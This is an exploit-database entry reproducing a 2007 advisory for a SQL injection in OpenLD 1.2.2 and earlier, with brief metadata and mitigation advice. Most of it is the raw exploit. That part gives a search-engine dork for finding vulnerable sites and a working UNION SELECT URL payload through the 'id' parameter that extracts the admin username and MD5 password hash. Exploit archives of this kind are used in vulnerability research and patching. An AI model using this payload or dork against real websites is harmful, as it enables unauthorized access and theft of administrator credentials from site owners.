OpenLD - exploit.company

vendor:

OpenLD

by:

Cody "CypherXero" Rester

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: OpenLD

Affected Version From: OpenLD <= 1.2.2

Affected Version To: OpenLD <= 1.2.2

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

OpenLD <= 1.2.2 SQL Injection Exploit

This exploit allows an attacker to execute SQL queries and retrieve sensitive information such as the admin username and MD5 hash. The vulnerability exists in the OpenLD version 1.2.2 and earlier. By manipulating the 'id' parameter in the URL, an attacker can inject SQL code and retrieve data from the 'settings' table.

Mitigation:

To mitigate this vulnerability, users should update to a patched version of OpenLD or use alternative software. Additionally, input validation and parameterized queries should be implemented to prevent SQL injection attacks.

Source

Exploit-DB raw data:

--==+================================================================================+==--
--==+                       OpenLD  <= 1.2.2 SQL Injection Exploit                   +==--
--==+================================================================================+==--
DISCOVERED BY: Cody "CypherXero" Rester
PAYLOAD: Admin username and MD5 Hash
WEBSITE: http://www.cypherxero.net

Shoutouts to my friends darkfusion and magikgrl for being fucking awesome. w0rd.
--==+================================================================================+==--

NOTES:

The table names may have an extension that is unique to the website. The standard table name
is "settings", but may be "openld_settngs" or possibly the name of the site.

DORK:

"Powered by OpenLD"

EXPLOITS:

http://www.website.com/index.php?id=999/**/UNION/**/SELECT/**/ALL/**/null,null,null,null,null,value,null,null,null,null,null,null,null,null/**/FROM/**/settings--

# milw0rm.com [2007-07-10]